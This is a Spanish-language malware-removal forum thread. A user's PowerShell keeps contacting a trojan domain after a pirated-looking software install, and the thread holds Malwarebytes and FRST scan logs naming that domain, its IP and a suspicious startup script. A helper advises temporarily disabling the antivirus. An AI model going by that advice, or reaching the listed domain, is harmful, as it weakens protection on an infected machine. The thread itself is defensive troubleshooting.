Virus usa powershell.exe para acceder a web maliciosa

Eliminar Malwares
1

Hola, primero que nada les deseo que pasen felices fiestas.

Anoche intente instalar AirExplorer Pro, para descargar un curso que me compartieron via google drive, y logró pasar atravez de bit defender, el cual lo tengo completamente actualizado y con licencia propia. Infectó algo y hace que el powershell.exe accese a cada minuto la pagina

Editado

Intente realizar varios scans, con bitdefender en modo de recuperación, con malwarebites, con adwcleaner y no logran encontrar de donde se ejecuta el script. Por ahora bitdefender y malwarebites bloquean la acción, también puse un bloqueo con netlimiter para que no pueda acceder a internet powershell, mientras encuentro como eliminar la infección. Espero me puedan ayudar a encontrar solución, adjunto los reportes de escaneo.

En el siguiente comentario los siguientes archivos, solo me permite agregar dos por publicación. Gracias de nuevo un abrazo!!. Addition.txt (51,3 KB) FRST.txt (37,8 KB)

2

AdwCleaner[S04].txt (1,7 KB) Rkill.txt (4,1 KB)

Siguientes dos archivos. Y adjunto abajo un resultado de malwarebites que si detectó y otro que ya no, pero sigue ahí la infección.

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 24/12/19
Hora del análisis: 19:33
Archivo de registro: f04ba25a-26be-11ea-baad-408d5c5ca09f.json

-Información del software-
Versión: 4.0.4.49
Versión de los componentes: 1.0.785
Versión del paquete de actualización: 1.0.16707
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 18362.476)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-1DF3CRC\saenz

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 326779
Amenazas detectadas: 0
Amenazas en cuarentena: 0
Tiempo transcurrido: 1 min, 33 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 0
(No hay elementos maliciosos detectados)

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 0
(No hay elementos maliciosos detectados)

Archivo: 0
(No hay elementos maliciosos detectados)

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)
Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del evento de protección: 24/12/19
Hora del evento de protección: 14:26
Archivo de registro: 184d6656-2694-11ea-af6b-408d5c5ca09f.json

-Información del software-
Versión: 4.0.4.49
Versión de los componentes: 1.0.785
Versión del paquete de actualización: 1.0.16693
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 18362.476)
CPU: x64
Sistema de archivos: NTFS
Usuario: System

-Detalles del sitio web bloqueado-
Sitio web malicioso: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Bloqueado, -1, -1, 0.0.0

-Datos de sitio web-
Categoría: Troyano
Dominio: manedina.top
Dirección IP: 51.38.140.3
Puerto: 54652
Tipo: Saliente
Archivo: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe



(end)
3

Hola @BigElros

Por alguna razón el reporte de FRST esta incompleto, le falta toda la cabecera. elimina el ejecutable de tu escritorio y los viejos reportes.

Vuelve a ejecutar el programa de la siguiente manera:

1.- Desactiva temporalmente tu antivirus y cualquier programa de seguridad.

2.- Descarga Farbar Recovery Scan Tool. en el escritorio, seleccionando la versión adecuada para la arquitectura (32 o 64bits) de su equipo. >> Como saber si mi Windows es de 32 o 64 bits.?

  • Ejecuta FRST.exe.
  • En el mensaje de la ventana del Disclaimer, pulsamos Yes
  • En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
  • Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Guía: Como Ejecutar FRST

3.- En tu próxima respuesta, pega los reportes generados.

Guía : ¿Como Pegar reportes en el Foro?

Esperamos esos reporte.

Salu2

1 me gusta
4

Hola, muchas gracias por la respuesta, aqui mi segundo intento en los reportes, descargue de nuevo la app y desactive los escudos de bitdefender y malwarebites. Saludos

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-12-2019 01
Ran by saenz (administrator) on DESKTOP-1DF3CRC (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-12-2019 22:50:54)
Running from C:\Users\saenz\Desktop
Loaded Profiles: saenz (Available Profiles: saenz)
Platform: Windows 10 Pro Version 1903 18362.476 (X64) Language: Español (México)
Default browser: "C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe" -- "%1"
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files\BLUE\Yeti_Pro_Driver\YetiProControlPanel.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated) C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender Agent\DiscoverySrv.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdtrackersnmh.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdwtxag.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\seccenter.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe
(Bitdefender SRL -> Bitdefender) C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> Brave Software, Inc.) C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\BraveCrashHandler.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\BraveCrashHandler64.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.422\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.422\GoogleCrashHandler64.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel(R) INTELND1820 -> Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Locktime Software s.r.o. -> Locktime Software) C:\Program Files\Locktime Software\NetLimiter 4\NLClientApp.exe
(Locktime Software s.r.o. -> Locktime Software) C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe
(Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech Gaming Software\LAClient\laclient.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19101.10711.0_x64__8wekyb3d8bbwe\Video.UI.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1911.3-0\MsMpEng.exe
(Node.js Foundation -> Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(Notepad++ -> Don HO [email protected]) C:\Program Files\Notepad++\notepad++.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.exe
(SlickVPN) [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\slickvpnsrvc.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\RtkAudUService64.exe [850512 2018-12-05] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-03-24] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [18727048 2018-10-05] (Logitech Inc -> Logitech Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2623032 2019-07-05] (Adobe Inc. -> Adobe Inc.)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5011504 2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] (OOO Lightshot -> )
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Run: [NetLimiter] => C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe [75264 2019-01-11] (Locktime Software s.r.o. -> Locktime Software)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe [5553712 2019-12-02] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Run: [Discord] => C:\Users\saenz\AppData\Local\Discord\app-0.0.305\Discord.exe [81780056 2019-03-07] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [47774856 2019-10-24] (Google LLC -> )
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-08-12] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\RunOnce: [Application Restart #0] => C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe [1995408 2019-12-21] (Brave Software, Inc. -> Brave Software, Inc.)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Run: [NetLimiter] => C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe [75264 2019-01-11] (Locktime Software s.r.o. -> Locktime Software)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe [5553712 2019-12-02] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Run: [Discord] => C:\Users\saenz\AppData\Local\Discord\app-0.0.305\Discord.exe [81780056 2019-03-07] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [47774856 2019-10-24] (Google LLC -> )
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-08-12] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\RunOnce: [Application Restart #0] => C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\brave.exe [1995408 2019-12-21] (Brave Software, Inc. -> Brave Software, Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.88\Installer\chrmstp.exe [2019-12-17] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\79.1.1.23\Installer\chrmstp.exe [2019-12-19] (Brave Software, Inc.) [File not signed]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{C6CB981E-DB30-4876-8639-109F8933582C}] -> C:\Program Files (x86)\BraveSoftware\Brave-Browser-Nightly\Application\79.1.4.42\Installer\chrmstp.exe [2019-12-21] (Brave Software, Inc.) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Yeti Pro Control Panel Autostart.lnk [2019-06-08]
ShortcutTarget: Yeti Pro Control Panel Autostart.lnk -> C:\Program Files\BLUE\Yeti_Pro_Driver\YetiProControlPanel.exe () [File not signed]
Startup: C:\Users\saenz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.ini.lnk [2019-12-24]
ShortcutTarget: Google.ini.lnk -> C:\Users\saenz\AppData\Google.js () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {013EC4AF-43F3-49EA-BE3D-2588725112C8} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {097B6FB3-002D-439A-82E2-F4D4048D47DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-02-27] (Google Inc -> Google Inc.)
Task: {229762DF-DF69-4354-9492-9B8353CDB605} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {22E2FDA5-CDD3-41E7-809D-F3701A90F15E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-09-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {29015290-E99D-4F86-B3A4-0F9BE6840F68} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {292105C6-EC0D-4A19-932D-8D8604EF176C} - System32\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {38D03EA9-6024-4B83-BAE4-F73E0E215404} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {3B7D112F-7379-4A48-89A6-FE173CD6A709} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [159368 2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {3E53475F-8A91-4154-A134-A8FE2A74DC1F} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\IntelPTTEKRecertification.exe [837344 2018-09-14] (Intel(R) Trust Services -> Intel(R) Corporation)
Task: {4A683882-5DA8-41A7-A16E-F17CB003F262} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [155472 2019-12-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {4C013ADC-2AF8-4519-810F-105720605F03} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MpCmdRun.exe [469648 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {58FA9FB1-AA84-4A06-90FD-546F79E3ADE1} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913720 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6C2B2F9B-B360-4B81-98B1-C6597FB26CFC} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [6072640 2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {72408C10-BF7C-4B91-85B2-58A6048848B0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [6072640 2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {784FDBBE-246E-4845-917F-437628A0D3C3} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24671608 2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {984FC1A6-D68E-4737-A937-AAB4B5E8497D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24671608 2019-12-05] (Microsoft Corporation -> Microsoft Corporation)
Task: {9AF3C405-BC1B-4030-88C0-50EC90C9D42C} - System32\Tasks\EPSON L1300 Series Invitation {3D13519D-D41E-4944-8882-7E5AAA0FE0EF} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSLVE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
Task: {A5601ED6-69A9-4B6E-98E7-DF26229483A2} - System32\Tasks\EPSON L1300 Series Update {3D13519D-D41E-4944-8882-7E5AAA0FE0EF} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSLVE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
Task: {B1E8EF34-C6BA-4B8C-9A56-78167255B173} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2107800 2019-12-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {B2DCBD0C-0FBF-475A-9DAD-0D909569F591} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [155472 2019-12-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {B5900A7C-4D41-44D5-9CE4-573BE5A0BB55} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MpCmdRun.exe [469648 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BD52C686-CB7D-4373-B7F1-9214DFF09FEA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MpCmdRun.exe [469648 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BD633554-55D4-4107-A68E-5E44E45EE763} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1133368 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C36B081F-395C-4F45-9AB4-3A8B976569B0} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2107800 2019-12-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {C480B6FF-DA93-45AE-A3AE-0E34A31E68A1} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [654456 2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
